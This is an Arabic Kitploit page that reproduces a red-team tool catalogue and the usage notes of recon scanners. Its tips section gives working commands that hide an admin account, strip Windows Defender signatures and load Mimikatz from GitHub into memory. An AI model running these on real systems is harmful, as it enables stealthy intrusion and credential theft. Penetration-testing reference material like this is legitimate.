Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Hack Tools — مشروع يجمع عدة أدوات اختبار الاختراق | Kitploit
أدوات/GitLabGitLab/edu0x01/hack-tools
أدوات دفاعيةأدوات التصيدتصعيد الامتيازاتالاستطلاعأطر الاستغلالالحركة الجانبيةاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرموارد منسقةتطوير الحمولات
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitLabedu0x01/hack-tools

Hack Tools

مشروع يجمع عدة أدوات اختبار الاختراق

عرض المستودعالموقع الإلكتروني

أدوات الاختراق

يحتوي هذا المستودع على مجموعة تضم أكثر من 200 أداة ومورد يمكن أن تكون مفيدة لأنشطة الفريق الأحمر.

قد تكون بعض الأدوات مصممة خصيصًا للفريق الأحمر، بينما تكون أخرى عامة الاستخدام ويمكن تكييفها للاستخدام في سياق الفريق الأحمر.

تحذير

المواد الموجودة في هذا المستودع هي لأغراض إعلامية وتعليمية فقط. وليست مخصصة للاستخدام في أي أنشطة غير قانونية.

ملاحظة

إخفاء عناوين قائمة الأدوات باستخدام السهم.

انقر 🔙 للعودة إلى القائمة.

أمر الاستنساخ```bash

git submodule update --init --recursive

root@kitploit:~
### إضافة مشروع جديد```bash
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

قائمة الأدوات

نصائح الفريق الأحمر $\textcolor{gray}{\text{13 نصيحة}}$
    • إخفاء حساب المسؤول المحلي @Alh4zr3d
    • تعطيل ويندوز ديفندر بحذف التواقيع @Alh4zr3d
    • تمكين جلسات RDP متعددة لكل مستخدم @Alh4zr3d
    • بديل محلي لـ Sysinternals PsExec.exe @GuhnooPlusLinux
    • ماسح منافذ بالاعتماد على الأدوات المحلية @Alh4zr3d
    • مدرك للبروكسي PowerShell DownloadString @Alh4zr3d
    • البحث عن نقاط النهاية الداخلية في إشارات المتصفح @Alh4zr3d
    • الاستعلام عن سجلات DNS للتعداد @Alh4zr3d
    • مسارات الخدمات غير المقتبسة بدون PowerUp @Alh4zr3d
    • تجاوز موجه الأوامر المعطل باستخدام /k Martin Sohn Christensen
    • منع ويندوز ديفندر من حذف mimikatz.exe @GuhnooPlusLinux
    • التحقق مما إذا كنت في جهاز افتراضي @dmcxblue
    • تعداد قواعد AppLocker @Alh4zr3d
الاستطلاع $\textcolor{gray}{\text{20 أداة}}$
    • crt.sh -> httprobe -> EyeWitness التقاط لقطات شاشة آلية للنطاقات
    • jsendpoints استخراج روابط DOM للصفحة
    • nuclei ماسح الثغرات الأمنية
    • certSniff متعقب كلمات مفتاحية في سجلات الشفافية للشهادات
    • gobuster تخمين مسارات المواقع بالقوة العمياء
    • feroxbuster أداة اكتشاف محتوى سريعة مكتوبة بلغة Rust
    • CloudBrute تخمين البنية التحتية السحابية بالقوة العمياء
    • dnsrecon تعداد سجلات DNS
    • Shodan.io قاعدة معرفة للأنظمة المواجهة للعامة
    • AORT (All in One Recon Tool) تعداد النطاقات الفرعية
    • spoofcheck مدقق سجلات SPF/DMARC
    • AWSBucketDump تعداد دلائل S3
    • GitHarvester باحث عن بيانات اعتماد على GitHub
    • truffleHog ماسح بيانات اعتماد على GitHub
    • Dismap اكتشاف/تحديد الأصول
    • enum4linux تعداد ويندوز/سامبا
    • skanuvaty ماسح DNS/شبكة/منافذ سريع جداً
    • Metabigor أداة استخبارات مفتوحة المصدر بدون API
    • Gitrob ماسح معلومات حساسة على GitHub
    • gowitness أداة التقاط لقطات شاشة للويب باستخدام Chrome Headless
تطوير الموارد $\textcolor{gray}{\text{8 أدوات}}$
    • Chimera إخفاء PowerShell
    • msfvenom إنشاء الحمولة
    • Shellter أداة حقن شيل كود ديناميكي
    • Freeze إنشاء الحمولة (تجاوز EDR)
    • WordSteal سرقة تجزئات NTML باستخدام Microsoft Word
    • WSH حمولة Wsh
    • HTA حمولة Hta
    • VBA حمولة Vba
الوصول الأولي $\textcolor{gray}{\text{6 أدوات}}$
    • Bash Bunny أداة هجوم عبر USB
    • EvilGoPhish إطار حملات التصيد
    • The Social-Engineer Toolkit إطار حملات التصيد
    • Hydra أداة تخمين بالقوة العمياء
    • SquarePhish إطار تصيد باستخدام OAuth/رمز QR
    • King Phisher إطار حملات التصيد
التنفيذ $\textcolor{gray}{\text{12 أداة}}$
    • Responder مسمم LLMNR وNBT-NS وMDNS
    • secretsdump مستخرج تجزئات عن بعد
    • evil-winrm شل WinRM
    • Donut تنفيذ .NET في الذاكرة
    • Macro_pack إخفاء الماكرو
    • PowerSploit مجموعة سكربتات PowerShell
    • Rubeus أداة اختراق الدليل النشط
    • SharpUp محدد ثغرات ويندوز
    • SQLRecon مجموعة أدوات MS-SQL هجومية
    • UltimateAppLockerByPassList تقنيات تجاوز AppLocker الشائعة
    • StarFighters مشغل Empire يعتمد على JavaScript وVBScript
    • demiguise أداة تشفير HTA
الثبات $\textcolor{gray}{\text{4 أدوات}}$
    • Impacket مجموعة سكربتات بايثون
    • Empire إطار ما بعد الاستغلال
    • SharPersist مجموعة أدوات الثبات لويندوز
    • ligolo-ng أداة نفق تستخدم واجهة TUN
تصعيد الامتيازات $\textcolor{gray}{\text{9 أدوات}}$
    • LinPEAS تصعيد الامتيازات في لينكس
    • WinPEAS تصعيد الامتيازات في ويندوز
    • linux-smart-enumeration تصعيد الامتيازات في لينكس
    • Certify تصعيد الامتيازات في الدليل النشط
    • Get-GPPPassword استخراج كلمات مرور ويندوز
    • Sherlock أداة تصعيد الامتيازات عبر PowerShell
    • Watson أداة تصعيد الامتيازات لويندوز
    • ImpulsiveDLLHijack أداة اختطاف DLL
    • ADFSDump أداة تفريغ AD FS
تجنب الدفاعات $\textcolor{gray}{\text{6 أدوات}}$
    • Invoke-Obfuscation مُبهم السكربتات
    • Veil مُبهم حمولة Metasploit
    • SharpBlock تجاوز EDR عبر منع تنفيذ نقطة الدخول
    • Alcatraz واجهة رسومية لإبهام ثنائيات x64
    • Mangle تلاعب بالملفات التنفيذية المترجمة
    • AMSI Fail مقتطفات PowerShell تعطل أو تعطيل AMSI
الوصول إلى بيانات الاعتماد $\textcolor{gray}{\text{9 أدوات}}$
    • Mimikatz مستخرج بيانات اعتماد ويندوز
    • LaZagne مستخرج كلمات مرور محلية
    • hashcat اختراق تجزئات كلمات المرور
    • John the Ripper اختراق تجزئات كلمات المرور
    • SCOMDecrypt أداة فك تشفير بيانات اعتماد SCOM
    • nanodump إنشاء تفريغ مصغر لعملية LSASS
    • eviltree إعادة صنع الشجرة لاكتشاف بيانات الاعتماد
    • SeeYouCM-Thief تحليل ملفات تكوين أنظمة هواتف سيسكو
    • MailSniper باحث بريد Microsoft Exchange
الاكتشاف $\textcolor{gray}{\text{6 أدوات}}$
    • PCredz اكتشاف بيانات اعتماد من PCAP/واجهة حية
    • PingCastle مقيم الدليل النشط
    • Seatbelt ماسح ثغرات محلي
    • ADRecon استطلاع الدليل النشط
    • adidnsdump تفريغ DNS المدمج في الدليل النشط
    • scavenger أداة مسح للبحث في الأنظمة
الحركة الجانبية $\textcolor{gray}{\text{12 أداة}}$
    • crackmapexec مجموعة أدوات الحركة الجانبية لويندوز/الدليل النشط
    • WMIOps أوامر WMI عن بعد
    • PowerLessShell PowerShell عن بعد بدون PowerShell
    • PsExec بديل خفيف للتلنت
    • LiquidSnake حركة جانبية بدون ملفات
    • تمكين RDP أمر تمكين RDP لويندوز
    • ترقية الشل إلى ميتربريتر تحسين الشل العكسي
    • إعادة توجيه المنافذ أمر إعادة توجيه المنافذ المحلية
    • شل Jenkins العكسي أمر شل Jenkins
    • ADFSpoof تزوير رموز أمان AD FS
    • kerbrute أداة لتخمين Kerberos قبل المصادقة بالقوة العمياء
    • Coercer إجبار خادم ويندوز على المصادقة
الجمع $\textcolor{gray}{\text{3 أدوات}}$
    • BloodHound تصور الدليل النشط
    • Snaffler جامع بيانات اعتماد الدليل النشط
    • linWinPwn تعداد الدليل النشط وفحص الثغرات
القيادة والتحكم $\textcolor{gray}{\text{6 أدوات}}$
    • Havoc إطار القيادة والتحكم
    • Covenant إطار القيادة والتحكم (.NET)
    • Merlin إطار القيادة والتحكم (Golang)
    • Metasploit Framework إطار القيادة والتحكم (Ruby)
    • Pupy إطار القيادة والتحكم (Python)
    • Brute Ratel إطار القيادة والتحكم ($$$)
التسريب $\textcolor{gray}{\text{5 أدوات}}$
    • Dnscat2 C2 عبر نفق DNS
    • Cloakify تحويل البيانات للتسريب
    • PyExfil إثبات مفهوم تسريب البيانات
    • Powershell RAT باب خلفي يعتمد على بايثون
    • GD-Thief تسريب جوجل درايف
التأثير $\textcolor{gray}{\text{3 أدوات}}$
    • Conti Pentester Guide Leak مجموعة أدوات تابعة لمجموعة برمجيات الفدية Conti
    • SlowLoris رفض خدمة بسيط
    • usbkill مفتاح إيقاف لمكافحة الأدلة الجنائية

نصائح الفريق الأحمر

تعلم من أعضاء الفريق الأحمر من خلال مجموعة من نصائح اختبار الاختراق كفريق أحمر. تغطي هذه النصائح مجموعة من التكتيكات والأدوات والمنهجيات لتحسين قدراتك في اختبار الاختراق كفريق أحمر.

ملاحظة: جميع النصائح تقريبًا من @Alh4zr3d، فهو ينشر نصائح ممتازة للفريق الأحمر!

🔙إخفاء حساب المسؤول المحلي```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**الوصف:** _'إن إنشاء الحسابات محفوف بالمخاطر عند التهرب من الفريق الأزرق، ولكن عند إنشاء مسؤول محلي، استخدم بعض السحر اللطيف في التسجيل لإخفائه.'_

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)تعطيل Windows Defender عن طريق حذف التوقيعات```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

الوصف: 'قد يكون الأمر فوضويًا بعض الشيء، لكن إذا كان Windows Defender يسبب لك صداعًا كبيرًا، فبدلاً من تعطيله (وهو ما ينبه المستخدم)، عليك فقط تحييده عن طريق حذف جميع التوقيعات.'

الائتمان: @Alh4zr3d

الرابط: تويتر

🔙تمكين جلسات RDP متعددة لكل مستخدم```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**الوصف:** _'أحيانًا ترغب في تسجيل الدخول إلى مضيف عبر RDP أو ما يشابهه، لكن المستخدم لديه جلسة نشطة. قم بتمكين جلسات متعددة لكل مستخدم.'_

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)بديل محلي لـ Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

الوصف: 'هل سئمت من رفع ملف Sysinternals PsExec.exe عند القيام بالحركة الجانبية؟ لدى Windows بديل أفضل مثبت مسبقًا. جرب هذا بدلاً من ذلك.'

المصدر: @GuhnooPlusLinux

الرابط: Twitter

🔙ماسح المنافذ المحلي```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**الوصف:** _'عندما يكون ذلك ممكنًا، استخدم الأدوات المتاحة على الجهاز بدلاً من رفع أدوات جديدة إليه (لعدة أسباب). PowerShell/.NET يساعدان. مثال: ماسح منافذ بسيط في PowerShell.'_

**الإسناد:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

الوصف: 'معظم المؤسسات الكبيرة تستخدم وكلاء الويب هذه الأيام. مهد التحميل القياسي لـ PowerShell لا يدعم الوكيل. استخدم هذا.'

الائتمان: @Alh4zr3d

الرابط: Twitter

🔙البحث عن نقاط النهاية الداخلية في إشارات المتصفح```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**الوصف:** _'قد تتفاجأ بما يمكنك اكتشافه من الإشارات المرجعية للمستخدم فقط. نقاط النهاية الداخلية التي يمكنه الوصول إليها، على سبيل المثال.'_

**الفضل:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)استعلام سجلات DNS للتعداد```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

الوصف: 'التعداد هو 95% من اللعبة. ومع ذلك، فإن إطلاق الكثير من عمليات المسح لتقييم البيئة يكون صاخبًا جدًا. لماذا لا نسأل فقط خادم DC/DNS عن جميع سجلات DNS؟'

الائتمان: @Alh4zr3d

الرابط: Twitter

🔙مسارات الخدمة غير المقتبسة بدون PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**الوصف:** _'العثور على مسارات الخدمة غير المقتبسة بدون PowerUp'_

**الائتمان:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**الرابط:** [تويتر](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)تجاوز موجه الأوامر المعطل باستخدام /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

الوصف: 'تم تعطيل موجه الأوامر هذا بواسطة المسؤول...' يمكن عادةً رؤيته في بيئات مثل أجهزة الكمبيوتر العامة (kiosk PCs)، الحل البديل السريع هو استخدام /k عبر مربع تشغيل Windows. سيقوم هذا بتنفيذ الأمر ثم عرض رسالة التقييد، مما يسمح بتنفيذ الأوامر.

الإسناد: Martin Sohn Christensen

الرابط: مدونة

🔙إيقاف Windows Defender عن حذف mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**الوصف:** _'هل سئمت من قيام Windows Defender بحذف mimikatz.exe؟ جرب هذا بدلاً من ذلك.'_

**الفضل:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**الرابط:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)تحقق مما إذا كنت في جهاز افتراضي```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

الوصف: 'هل تريد معرفة إذا كنت داخل جهاز افتراضي؟ استعلم عن مفاتيح التسجيل واكتشف!!! إذا ظهرت أي نتائج فأنت داخل جهاز افتراضي.'

المصدر: @dmcxblue

الرابط: تويتر

🔙قائمة قواعد AppLocker```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**الوصف:** _'يمكن أن يكون AppLocker مزعجًا. قم بالاستكشاف لترى مدى الإزعاج'_

**رصيد:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**رابط:** [تويتر](https://twitter.com/alh4zr3d/status/1614706476412698624)

# الاستطلاع

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

لقد قمت بتجميع أمر bash بسطر واحد يقوم بـ:

- جمع قائمة بالنطاقات الفرعية بشكل سلبي من ارتباطات الشهادات ([crt.sh](https://crt.sh/))
- طلب كل نطاق فرعي بشكل نشط للتحقق من وجوده ([httprobe](https://github.com/tomnomnom/httprobe))
- التقاط لقطة شاشة لكل نطاق فرعي للمراجعة اليدوية ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**الاستخدام:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

ملاحظة: يجب أن يكون لديك httprobe و pup و EyeWitness مثبتة وتغيير 'DOMAIN_COM' إلى النطاق المستهدف. يمكنك تشغيل هذا السكربت في نوافذ طرفية متزامنة إذا كان لديك عدة نطاقات جذرية مستهدفة.

image

image

🔙jsendpoints

إشارة مرجعية جافاسكريبت لاستخراج جميع روابط نقاط النهاية في صفحة ويب.

تم إنشاؤه بواسطة @renniepak، يمكن استخدام مقتطف كود جافاسكريبت هذا لاستخراج جميع نقاط النهاية (التي تبدأ بـ /) من DOM صفحة الويب الحالية بما في ذلك جميع مصادر السكربتات الخارجية المضمنة في الصفحة.```javascript javascript: (function () { var scripts = document.getElementsByTagName("script"), regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g; const results = new Set(); for (var i = 0; i < scripts.length; i++) { var t = scripts[i].src; "" != t && fetch(t) .then(function (t) { return t.text(); }) .then(function (t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); }) .catch(function (t) { console.log("An error occurred: ", t); }); } var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex); for (const match of matches) results.add(match[0]); function writeResults() { results.forEach(function (t) { document.write(t + "
"); }); } setTimeout(writeResults, 3e3); })();

root@kitploit:~
**الاستخدام (الإشارة المرجعية - Bookmarklet)**

قم بإنشاء إشارة مرجعية...

- `انقر بزر الماوس الأيمن على شريط الإشارات المرجعية`
- `انقر على 'إضافة صفحة'`
- `الصق كود جافاسكريبت أعلاه في مربع 'url'`
- `انقر على 'حفظ'`

...ثم قم بزيارة الصفحة المستهدفة في المتصفح وانقر على الإشارة المرجعية.

![image](https://assets.kitploit.com/production/public/readmes/495/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**الاستخدام (وحدة التحكم - Console)**

الصق كود جافاسكريبت أعلاه في نافذة وحدة التحكم `F12` واضغط على Enter.

![image](https://assets.kitploit.com/production/public/readmes/495/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

ماسح ضوئي سريع للثغرات الأمنية يستخدم قوالب .yaml للبحث عن مشكلات محددة.

**التثبيت:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

الاستخدام:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)

<h1 align="center">
قوالب Nuclei
</h1>
<h4 align="center">قائمة منسقة من القوالب لمحرك nuclei لاكتشاف الثغرات الأمنية في التطبيقات.</h4>

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
      
<p align="center">
  <a href="https://nuclei.projectdiscovery.io/templating-guide/">الوثائق</a> •
  <a href="#-contributions">المساهمات</a> •
  <a href="#-discussion">النقاش</a> •
  <a href="#-community">المجتمع</a> •
  <a href="https://nuclei.projectdiscovery.io/faq/templates/">الأسئلة الشائعة</a> •
  <a href="https://discord.gg/projectdiscovery">انضم إلى DC</a>
</p>

---

القوالب هي جوهر [ماسح nuclei](https://github.com/projectdiscovery/nuclei) الذي يحرك محرك المسح الفعلي.
يخزن هذا المستودع ويضم قوالب مختلفة للماسح تم توفيرها من قبل فريقنا، بالإضافة إلى تلك المساهمة من المجتمع.
نأمل أن تساهم أنت أيضًا بإرسال قوالب عبر **طلبات السحب** أو [قضايا Github](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) لتنمية القائمة.

## نظرة عامة على قوالب Nuclei

نظرة عامة على مشروع قوالب nuclei، بما في ذلك إحصائيات حول العلامات الفريدة، المؤلف، الدليل، الخطورة، ونوع القوالب. يحتوي الجدول أدناه على أعلى عشر إحصائيات لكل مصفوفة؛ نسخة موسعة من هذا [متاحة هنا](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md)، ومتاحة أيضًا بتنسيق [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) للتكامل.

<table>
<tr>
<td>

## إحصائيات أفضل 10 قوالب Nuclei

| العلامة      | العدد   | المؤلف         | العدد   | الدليل                | العدد   | الخطورة    | العدد   | النوع | العدد   |
| ------------ | ------- | -------------- | ------- | --------------------- | ------- | ---------- | ------- | ----- | ------- |
| cve          | 1855    | dhiyaneshdk    | 835     | http                  | 5860    | info       | 2857    | file  | 123     |
| panel        | 896     | dwisiswant0    | 794     | workflows             | 190     | high       | 1270    | dns   | 18      |
| wordpress    | 781     | daffainfo      | 664     | file                  | 123     | medium     | 1042    |       |         |
| exposure     | 677     | pikpikcu       | 353     | network               | 93      | critical   | 704     |       |         |
| wp-plugin    | 672     | pdteam         | 278     | dns                   | 18      | low        | 216     |       |         |
| xss          | 646     | pussycat0x     | 240     | ssl                   | 12      | unknown    | 26      |       |         |
| osint        | 639     | geeknik        | 220     | headless              | 9       |            |         |       |         |
| tech         | 602     | ricardomaia    | 215     | TEMPLATES-STATS.json  | 1       |            |         |       |         |
| edb          | 596     | ritikchaddha   | 210     | contributors.json     | 1       |            |         |       |         |
| lfi          | 548     | 0x_akoko       | 179     | cves.json             | 1       |            |         |       |         |

**404 دليلاً، 6542 ملفًا**.

</td>
</tr>
</table>

## 📖 الوثائق

يرجى الانتقال إلى https://nuclei.projectdiscovery.io للحصول على وثائق مفصلة لـ **بناء** قوالب جديدة أو **مخصصة** خاصة بك.
لقد أضفنا أيضًا مجموعة من القوالب لمساعدتك على فهم كيفية عمل الأمور.

## 💪 المساهمات

يتم تشغيل قوالب nuclei بفضل المساهمات الكبيرة من المجتمع.
[مساهمات القوالب](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)، [طلبات الميزات](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) و [تقارير الأخطاء](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) مرحب بها أكثر من أي وقت مضى.

![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "صورة تحليلات Repobeats")

## 💬 النقاش

هل لديك أسئلة / شكوك / أفكار للمناقشة؟
لا تتردد في فتح نقاش على لوحة [مناقشات Github](https://github.com/projectdiscovery/nuclei-templates/discussions).

## 👨‍💻 المجتمع

أنت مدعوم للانضمام إلى [مجتمع Discord النشط](https://discord.gg/projectdiscovery) لمناقشة الأمور مباشرة مع القائمين على المشروع ومشاركة الأشياء مع الآخرين حول الأمان والأتمتة.
بالإضافة إلى ذلك، يمكنك متابعتنا على [Twitter](https://twitter.com/pdnuclei) لتبقى على اطلاع بكل ما يتعلق بـ Nuclei.

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&amp;max=300">
</a>
</p>

شكرًا مرة أخرى على مساهمتك والحفاظ على حيوية هذا المجتمع. :heart:

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff هي أداة مراقبة كلمات مفتاحية لسجلات شهادات SSL مطبقة بلغة Python. تستخدم مكتبة certstream لمراقبة سجلات إنشاء الشهادات التي تحتوي على كلمات مفتاحية محددة في ملف.

يمكنك تشغيلها بعدة كلمات مفتاحية تتعلق بالمجال الهدف، حيث سيتم تسجيل أي إنشاء شهادات قد يؤدي إلى اكتشاف مجالات لم تكن على علم بها من قبل.

**التثبيت:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

الاستخدام:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/5cfb98ddfd270f9f57aa774a49dd21ee41ae79bbf430e012834e9c85cf221c5e.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

أداة رائعة لاختراق (تخمين) مسارات الملفات/المجلدات على موقع ضحية.

**التثبيت:**```bash
sudo apt install gobuster

الاستخدام:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

أداة مصممة لتنفيذ التصفح القسري، وهو هجوم يهدف فيه المهاجم إلى تعداد والوصول إلى الموارد التي لا يتم الإشارة إليها من قِبل تطبيق الويب، ولكنها لا تزال قابلة للوصول من قِبل المهاجم.

يستخدم Feroxbuster القوة الغاشمة مع قائمة كلمات للبحث عن محتوى غير مرتبط في الدلائل المستهدفة. قد تخزن هذه الموارد معلومات حساسة حول تطبيقات الويب والأنظمة التشغيلية، مثل الكود المصدري وبيانات الاعتماد وعناوين الشبكة الداخلية، وما إلى ذلك...

**تثبيت: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

تثبيت: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**تثبيت: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

للحصول على تعليمات التثبيت الكاملة، راجع هنا.

الاستخدام:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
يمكن العثور على أمثلة الاستخدام الكاملة [هنا](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/495/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

_الصورة مستخدمة من https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif_

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

أداة للعثور على البنية التحتية والملفات والتطبيقات الخاصة بشركة (هدف) على مزودي الخدمات السحابية الرائدين (أمازون، جوجل، مايكروسوفت، ديجيتال أوشن، علي بابا، فولتر، لينود).

الميزات:

- كشف السحابة (IPINFO API ورمز المصدر)
- سريع (متزامن)
- متعدد المنصات (ويندوز، لينكس، ماك)
- عشوائية وكيل المستخدم
- عشوائية الوكيل (HTTP, Socks5)

**تثبيت:**

حمّل أحدث [إصدار](https://github.com/0xsha/CloudBrute/releases) لنظامك واتبع التعليمات.

**الاستخدام:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

الصورة مستخدمة من https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon هي أداة pyhton لتعداد سجلات DNS (MX, SOA, NS, A, AAAA, SPF و TXT) ويمكنها توفير عدد من مضيفي الضحايا المرتبطين الجدد للانتقال إليهم من بحث نطاق واحد.

التثبيت:```bash sudo apt install dnsrecon

root@kitploit:~
**الاستخدام:**```bash
dnsrecon -d google.com

image

🔙shodan.io

